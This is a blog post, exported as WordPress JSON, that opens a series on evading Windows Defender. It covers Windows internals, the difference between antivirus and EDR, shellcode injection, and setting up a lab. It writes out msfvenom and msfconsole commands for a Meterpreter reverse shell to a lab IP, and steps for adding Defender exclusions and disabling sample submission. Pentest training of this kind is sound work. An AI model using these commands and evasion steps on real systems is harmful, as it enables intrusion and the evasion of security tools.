{"id":2911,"date":"2025-04-07T22:00:19","date_gmt":"2025-04-07T22:00:19","guid":{"rendered":"https:\/\/www.hackmosphere.fr\/?p=2911"},"modified":"2026-06-12T17:21:48","modified_gmt":"2026-06-12T17:21:48","slug":"bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1","status":"publish","type":"post","link":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","title":{"rendered":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>Reading Time<\/strong>: 10 minutes<br\/><strong>Technical Level<\/strong>: Advanced<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Update:<\/strong> This post was last updated in June 2026 (mainly to add explanations about the compilation process, but the technique still works).<\/p>\n\n<h2 class=\"wp-block-heading\"><a>Introduction<\/a><\/h2>\n\n<p class=\"wp-block-paragraph\">As pentesters, we always have to keep up to date with the latest trends and, of course, bypassing antiviruses is part of our activities. In this article, we will discuss how to bypass antiviruses and, since the topic is quite big, it will be divided into two separate articles:<\/p>\n\n<ol class=\"wp-block-list\">\n<li>Basics of the Windows architecture and the workings of antivirus. 
Then we will cover how to set up a testing lab and execute raw shellcode using C++<\/li>\n\n\n\n<li>How to bypass static &amp; dynamic detections using various techniques<\/li>\n<\/ol>\n\n<p class=\"wp-block-paragraph\">If you are already familiar with the theory behind antivirus evasion, you can go directly to the technical implementation, accessible <a href=\"https:\/\/www.hackmosphere.fr\/en\/bypass-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n\n<p class=\"wp-block-paragraph\">Evading antivirus detection remains a major challenge in offensive cybersecurity, particularly when dealing with Windows Defender, which is deployed by default on millions of Windows systems. In this technical article, we explore a modern bypass approach using shellcode encryption, direct syscalls and remote process injection.<\/p>\n\n<div style=\"height:39px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\"><strong>Key Takeaways<\/strong><\/p>\n\n<ul class=\"wp-block-list\">\n<li>Understanding the basics of the Windows execution flow<\/li>\n\n\n\n<li>Understanding the basics of how antiviruses work<\/li>\n\n\n\n<li>Setting up a lab for practice<\/li>\n\n\n\n<li>Executing raw shellcode using C++<\/li>\n\n\n\n<li>Implementing evasion techniques<\/li>\n<\/ul>\n\n<div style=\"height:36px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\">All the code we present in this article is accessible here: <a href=\"https:\/\/Github.com\/hackmosphere\/DefenderBypass\">https:\/\/Github.com\/hackmosphere\/DefenderBypass<\/a>. We aim to provide several examples that should help you understand the different steps used for bypassing antiviruses (AVs). 
Before diving into it, here is a brief overview of what each file does:<\/p>\n\n<ul class=\"wp-block-list\">\n<li><strong>myEncoder3.py<\/strong>: Transforms a given binary file&#8217;s (.bin) data into hexadecimal data and XOR encrypts it using the given key. Upon running the script, both the non-encrypted and encrypted hex data are shown to the user<\/li>\n\n\n\n<li><strong>InjectBasic.cpp<\/strong>: Basic shellcode injector written in C++<\/li>\n\n\n\n<li><strong>InjectCryptXOR.cpp<\/strong>: InjectBasic.cpp + XOR decryption of a given XOR-encrypted shellcode<\/li>\n\n\n\n<li><strong>InjectSyscall-LocalProcess.cpp<\/strong>: InjectCryptXOR.cpp + injection of the shellcode into the local process &amp; use of direct syscalls to bypass userland hooks, removing suspicious functions from the Import Address Table (IAT)<\/li>\n\n\n\n<li><strong>InjectSyscall-RemoteProcess.cpp<\/strong>: InjectSyscall-LocalProcess.cpp, but injecting into a remote process instead of the local process<\/li>\n<\/ul>\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\"><strong>Disclaimer<\/strong><\/p>\n\n<p class=\"wp-block-paragraph\">This is not a tutorial on writing malware, but a practical case for educational purposes only.<\/p>\n\n<p class=\"wp-block-paragraph\">Moreover, the code will probably stop working soon after its disclosure. 
It is up to you to make it work again by adding (often minor) modifications to it (hint: threatcheck.exe should help you) \ud83d\ude0a<\/p>\n\n<div style=\"height:43px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Basics of Windows execution flow<\/h2>\n\n<p class=\"wp-block-paragraph\">Before delving into the topic of antivirus evasion, it is important to first understand some basics about Windows.<\/p>\n\n<p class=\"wp-block-paragraph\">The simple diagram shown below, made by Alexander Sotirov, represents the Windows program execution flow, specifically focusing on the relationship between applications, libraries (DLLs), and the Windows kernel:<\/p>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"989\" height=\"687\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image.png\" alt=\"Basics of Windows execution flow\" class=\"wp-image-2885\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image.png 989w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-980x681.png 980w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-480x333.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 989px, 100vw\" \/><\/figure>\n\n<p class=\"wp-block-paragraph\">Here&#8217;s a breakdown of each component shown in the figure above:<\/p>\n\n<ol class=\"wp-block-list\">\n<li><strong>Applications<\/strong> represent the programs that users interact with, like &#8220;firefox.exe&#8221;<\/li>\n\n\n\n<li>Applications make calls to Dynamic Link Libraries (<strong>DLLs<\/strong>) to leverage Windows functionalities without needing direct access to lower-level code. 
Some of these DLLs might handle tasks such as user interface operations or file management<\/li>\n\n\n\n<li><strong>Kernel32.dll<\/strong> is one of the core DLLs in the Windows operating system. It provides essential functions for memory management, I\/O operations, and process and thread creation<\/li>\n\n\n\n<li><strong>Ntdll.dll<\/strong> is the lowest-level user-mode DLL. It exposes the NT API (Native API), which allows applications to make low-level calls that interface with the Windows kernel. This library acts as a middle layer between user-mode components (like applications) and the kernel, converting user requests into system calls (<strong>syscalls<\/strong>, more on that later) that the kernel can understand<\/li>\n\n\n\n<li>The <strong>kernel<\/strong> is the core part of the Windows operating system, responsible for managing system resources, including memory, processes, and hardware interactions. It operates in &#8220;kernel mode,&#8221; which has unrestricted access to the hardware, unlike &#8220;user mode&#8221;, where applications and DLLs run with limited permissions. 
The kernel handles system calls made from Ntdll.dll and executes them with direct access to system resources<\/li>\n<\/ol>\n\n<h3 class=\"wp-block-heading\">Example of operation flow for creating a file in C++<\/h3>\n\n<ol class=\"wp-block-list\">\n<li><strong>CreateFile function is invoked in the code<\/strong> &#8211; Applications make API calls to interact with the system<\/li>\n\n\n\n<li><strong>CreateFile forwards to NtCreateFile<\/strong> &#8211; Calls are passed through various DLLs (such as Kernel32) or directly to Ntdll.dll<\/li>\n\n\n\n<li><strong>NtCreateFile syscall is triggered<\/strong> &#8211; Ntdll.dll converts these API calls into low-level system calls (<strong>syscalls<\/strong>)<\/li>\n\n\n\n<li><strong>Creates the file and returns a handle<\/strong> &#8211; The kernel executes these system calls, managing hardware and system resources as needed<\/li>\n<\/ol>\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Antivirus &amp; Shellcode overview<\/h2>\n\n<p class=\"wp-block-paragraph\">Antivirus (AV) &amp; Endpoint Detection and Response (EDR) are both critical components of cybersecurity, but they serve distinct purposes.<\/p>\n\n<h3 class=\"wp-block-heading\">AV vs EDR: Key Differences<\/h3>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"535\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png\" alt=\"AV vs EDR: Key Differences\" class=\"wp-image-2887\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png 979w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1-480x262.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 979px, 100vw\" \/><\/figure>\n\n<h3 class=\"wp-block-heading\">Antivirus<\/h3>\n\n<p class=\"wp-block-paragraph\">Windows Defender, like any traditional antivirus 
solution, primarily focuses on a <strong>preventive approach<\/strong>. It relies on two main pillars to detect and mitigate threats:<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Static Analysis: Identifying threats by matching known signatures in files.<\/li>\n\n\n\n<li>Dynamic Analysis: Monitoring application behavior using sandboxing or limited behavioral analysis techniques.<\/li>\n<\/ul>\n\n<p class=\"wp-block-paragraph\">While effective against known threats, this approach often falls short against advanced and emerging attack vectors.<\/p>\n\n<h3 class=\"wp-block-heading\">EDR (Endpoint Detection and Response)<\/h3>\n\n<p class=\"wp-block-paragraph\">These solutions go beyond prevention, taking a more <strong>proactive and investigative approach<\/strong>. They let programs run and continuously monitor endpoint (servers, computers&#8230;) activity, leveraging behavioral analysis at the kernel level and other advanced detection mechanisms to uncover anomalies and potential threats.<\/p>\n\n<h3 class=\"wp-block-heading\">Antivirus VS EDR<\/h3>\n\n<p class=\"wp-block-paragraph\">Antivirus focuses on stopping threats before they get executed on the system, serving as a virtual &#8220;front door lock&#8221;.<\/p>\n\n<p class=\"wp-block-paragraph\">EDR assumes that breaches are inevitable and prioritizes post-compromise visibility and incident response to minimize damage and facilitate recovery.<\/p>\n\n<p class=\"wp-block-paragraph\">Together, these tools form a layered defense strategy, with antivirus addressing prevention and EDR focusing on detection, investigation, and remediation.<\/p>\n\n<p class=\"wp-block-paragraph\"><em>Note: This blog explores the intricacies of antivirus evasion, while the equally critical topic of EDR evasion deserves its own dedicated article. Stay tuned! 
<\/em><\/p>\n\n<div style=\"height:44px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Shellcode understanding<\/h2>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"144\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-2.png\" alt=\"Shellcode understanding\" class=\"wp-image-2889\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-2.png 799w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-2-480x87.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 799px, 100vw\" \/><\/figure>\n\n<p class=\"wp-block-paragraph\">When exploiting a vulnerability in a target, you need a payload that will make the victim do what you want.<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Payloads<\/strong> can take several forms, one of which is called a <strong>shellcode<\/strong>. Typically written in binary, shellcode is injected into a target&#8217;s process or memory space to execute malicious instructions. <\/p>\n\n<p class=\"wp-block-paragraph\">The term &#8220;shellcode&#8221; originates from its original purpose: delivering a shell (command prompt) to the attacker, but modern shellcode can perform various tasks, from privilege escalation to downloading and executing additional payloads. In cybersecurity, shellcode is both a weapon for attackers and a tool for defenders, such as penetration testers, who use it to simulate real-world exploits during security assessments. Understanding shellcode is critical for detecting and mitigating attacks that leverage this technique to bypass defences and compromise systems.  
<\/p>\n\n<h3 class=\"wp-block-heading\">Shellcode injection<\/h3>\n\n<p class=\"wp-block-paragraph\">Allocate &#8211; Write &#8211; Execute: these are the steps usually followed to inject shellcode into a process (other, more advanced techniques exist, but they are out of the scope of this article):<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Allocating an RWX memory region the size of the shellcode<\/li>\n\n\n\n<li>Writing the shellcode into that memory region<\/li>\n\n\n\n<li>Executing the content of the allocated memory<\/li>\n<\/ul>\n\n<div style=\"height:43px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\"><a>How to set up a lab to bypass an antivirus?<\/a><\/h2>\n\n<p class=\"wp-block-paragraph\">For testing, you need an attacking Kali VM and a victim Windows VM: they must be able to communicate with one another.<\/p>\n\n<h3 class=\"wp-block-heading\">Kali<\/h3>\n\n<p class=\"wp-block-paragraph\">On the attacking Kali VM (here 192.168.242.128), you MUST:<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Generate a Meterpreter shellcode (which is highly detectable by antivirus software\u2014on purpose \ud83d\ude09) that will be injected into our loader. 
For example:\n<ul class=\"wp-block-list\">\n<li>msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.242.128 LPORT=443 EXITFUNC=thread --platform windows -f raw -o reverse64-192168242128-443.bin<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"937\" height=\"149\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-3.png\" alt=\"\" class=\"wp-image-2891\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-3.png 937w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-3-480x76.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 937px, 100vw\" \/><\/figure>\n\n<ul class=\"wp-block-list\">\n<li>Launch a Meterpreter listener to receive the connection from the Windows victim when you run your loader:<ul class=\"wp-block-list\">\n<li>msfconsole<\/li>\n<li>use exploit\/multi\/handler<\/li>\n<li>set payload windows\/x64\/meterpreter\/reverse_tcp<\/li>\n<li>set LPORT 443<\/li>\n<li>set LHOST 192.168.242.128<\/li>\n<li>run<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"246\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-4.png\" alt=\"\" class=\"wp-image-2893\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-4.png 979w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-4-480x121.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 979px, 100vw\" \/><\/figure>\n\n<div style=\"height:41px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h3 class=\"wp-block-heading\">Windows<\/h3>\n\n<p class=\"wp-block-paragraph\">On the Windows victim, you MUST:<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Ensure the attacking VM and victim VM can communicate with one 
another<\/li>\n\n\n\n<li>Ensure both Windows and Defender are up to date<\/li>\n\n\n\n<li>Make an antivirus exclusion on a chosen directory. This will ensure that your program works at all before attempting to actually bypass Defender<\/li>\n\n\n\n<li>When testing locally, you may want to <strong>disable &#8220;Automatic sample submission&#8221;.<\/strong> Otherwise, your test executables might be uploaded to Microsoft for analysis and quickly flagged by Defender and other AVs &#8211; even before you&#8217;ve finished development.<br\/><br\/>\u26a0\ufe0f Note: While turning off sample submission can help during development, it does impact Defender&#8217;s overall detection capabilities, particularly when using higher Cloud Protection Levels. In those setups, Defender may rely on the cloud to determine whether a file is malicious. Disabling submission can limit that analysis.<br\/>This setup is intended for local lab use only &#8211; always re-enable full protection (including sample submission) outside of controlled test environments.<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"283\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-5.png\" alt=\"\" class=\"wp-image-2895\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-5.png 901w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-5-480x151.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 901px, 100vw\" \/><\/figure>\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h3 class=\"wp-block-heading\">How to execute basic shellcode using C++?<\/h3>\n\n<p class=\"wp-block-paragraph\">After setting up the lab, you should have a file called &#8220;reverse64-192168242128-443.bin&#8221;. 
This file contains the shellcode that you must execute to connect back to your attacking machine and obtain full control over the victim.<\/p>\n\n<p class=\"wp-block-paragraph\">As discussed earlier, shellcode is binary data. We therefore need to convert it to hexadecimal data so that it can be embedded in C++ source code. This can be done using myEncoder3.py, available <a href=\"https:\/\/github.com\/Hackmosphere\/DefenderBypass\/blob\/main\/myEncoder3.py\">here<\/a> (don&#8217;t forget to run &#8220;pip3 install -r requirements.txt&#8221; first):<\/p>\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"315\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-1024x315.png\" alt=\"How to execute basic shellcode using C++?\" class=\"wp-image-2897\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-1024x315.png 1024w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-980x301.png 980w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-480x147.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1024px, 100vw\" \/><\/figure>\n\n<div style=\"height:109px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\">Now that the lab is up and you have created your shellcode, it is FINALLY time to implement your first shellcode injection! Yeyy! 
<\/p>\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"357\" height=\"352\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-7.png\" alt=\"\" class=\"wp-image-2899\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-7.png 357w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-7-300x296.png 300w\" sizes=\"(max-width: 357px) 100vw, 357px\" \/><\/figure>\n\n<div style=\"height:103px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\">From the GitHub repository, you can download the C++ file <a href=\"https:\/\/github.com\/Hackmosphere\/DefenderBypass\/blob\/main\/injectBasic.cpp\">\u201cinjectBasic.cpp\u201d<\/a>. It provides a very basic shellcode injection technique (Allocate &#8211; Write &#8211; Execute, remember? \ud83d\ude0a). Here are the key steps of our implementation:<\/p>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"344\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-8.png\" alt=\"\" class=\"wp-image-2901\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-8.png 979w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-8-480x169.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 979px, 100vw\" \/><\/figure>\n\n<p class=\"wp-block-paragraph\"><strong>Code explanation:<\/strong> the shellcode obtained from myEncoder3.py is first placed in the &#8220;shellcode[]&#8221; array. RWX memory the size of the shellcode is then allocated through &#8220;VirtualAlloc()&#8221;. The shellcode is then copied there with &#8220;memcpy()&#8221; before being executed. 
<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>OPSEC:<\/strong> Allocating memory with PAGE_EXECUTE_READWRITE rights is a strong indicator and often results in being flagged by security solutions. It would be more OPSEC-friendly to first allocate the memory as PAGE_READWRITE, write the payload, and then change the protection to executable. For an example of an OPSEC-friendly implementation, check the next article \ud83d\ude09<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Installing g++<\/strong>: <a href=\"https:\/\/gist.github.com\/ahmednawazkhan\/4da8acbdafe0798527874b0f00f16e45#file-installing-cpp-on-windows-md\">A Step-by-Step Guide<\/a><\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Compiling:<\/strong> g++ injectBasic.cpp -o OutputFile.exe -O2 -s -fno-exceptions -fno-rtti -ffunction-sections -fdata-sections -Wl,--gc-sections -std=c++11<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Running<\/strong> &#8220;FirstExample.exe&#8221; in the exclusion folder:<\/p>\n\n<ul class=\"wp-block-list\">\n<li>In the folder <em>where you have an exclusion<\/em>, running your code should provide you with a Meterpreter reverse shell on your attacking machine 
\ud83d\ude0a<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"966\" height=\"314\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-9.png\" alt=\"\" class=\"wp-image-2903\" style=\"width:735px;height:auto\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-9.png 966w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-9-480x156.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 966px, 100vw\" \/><\/figure>\n\n<ul class=\"wp-block-list\">\n<li>Now try dropping the executable into a folder where no exclusion is in place: it should result in immediate detection by Windows Defender.<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"632\" height=\"654\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-10.png\" alt=\"\" class=\"wp-image-2905\" style=\"width:459px\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-10.png 632w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-10-480x497.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 632px, 100vw\" \/><\/figure>\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Conclusion<\/h2>\n\n<p class=\"wp-block-paragraph\">In this first article of a two-part series, we covered the basics needed to understand the Windows execution flow, what antiviruses are and how they work.<\/p>\n\n<p class=\"wp-block-paragraph\">We also explained how to set up a lab so you can practice with complete peace of mind. Finally, we provided basic C++ code to execute shellcode generated using msfvenom. Obviously, this code was immediately detected upon landing on the disk. 
<\/p>\n\n<p class=\"wp-block-paragraph\">The second article, available <a href=\"https:\/\/www.hackmosphere.fr\/en\/bypass-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>, discusses how to implement evasion techniques that will bypass Windows Defender&#8217;s detection.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reading Time: 10 minutesTechnical Level: Advanced Update: This post was last updated in June 2026 (mainly to add explanations about the compilation process, but the technique still works). Introduction As pentesters, we always have to keep up to date with the latest trends and of course, bypassing antiviruses is part of our activities. In this [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2888,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_titles_title":"Windows Defender antivirus bypass in 2025 - part 1","_seopress_titles_desc":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. 
Basic code is provided to start experimenting!","_seopress_robots_index":"","_seopress_robots_follow":"","_seopress_robots_imageindex":"","_seopress_robots_snippet":"","_seopress_robots_primary_cat":"8","_seopress_robots_breadcrumbs":"","_seopress_robots_freeze_modified_date":"","_seopress_robots_custom_modified_date":"","_seopress_robots_canonical":"","_seopress_social_fb_title":"","_seopress_social_fb_desc":"","_seopress_social_fb_img":"","_seopress_social_fb_img_attachment_id":0,"_seopress_social_fb_img_width":0,"_seopress_social_fb_img_height":0,"_seopress_social_twitter_title":"","_seopress_social_twitter_desc":"","_seopress_social_twitter_img":"","_seopress_social_twitter_img_attachment_id":0,"_seopress_social_twitter_img_width":0,"_seopress_social_twitter_img_height":0,"_seopress_redirections_value":"","_seopress_redirections_enabled":"","_seopress_redirections_enabled_regex":"","_seopress_redirections_logged_status":"both","_seopress_redirections_param":"","_seopress_redirections_type":301,"_seopress_analysis_target_kw":"","_et_pb_use_builder":"off","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[41,18,44],"tags":[],"class_list":["post-2911","post","type-post","status-publish","format-standard","has-post-thumbnail","category-cyber-services","category-red-team","category-red-teaming-en"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere<\/title>\n<meta name=\"description\" content=\"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. 
Basic code is provided to start experimenting!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere\" \/>\n<meta property=\"og:description\" content=\"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/\" \/>\n<meta property=\"og:site_name\" content=\"Hackmosphere\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-07T22:00:19+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-06-12T17:21:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"979\" \/>\n\t<meta property=\"og:image:height\" content=\"535\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"hackmin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"hackmin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\"},\"author\":{\"name\":\"hackmin\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/person\\\/5821c6ff778edf6f4ebd2ee1f69fa937\"},\"headline\":\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1\",\"datePublished\":\"2025-04-07T22:00:19+00:00\",\"dateModified\":\"2026-06-12T17:21:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\"},\"wordCount\":1855,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"articleSection\":[\"Cyber Services\",\"Red Team\",\"Red 
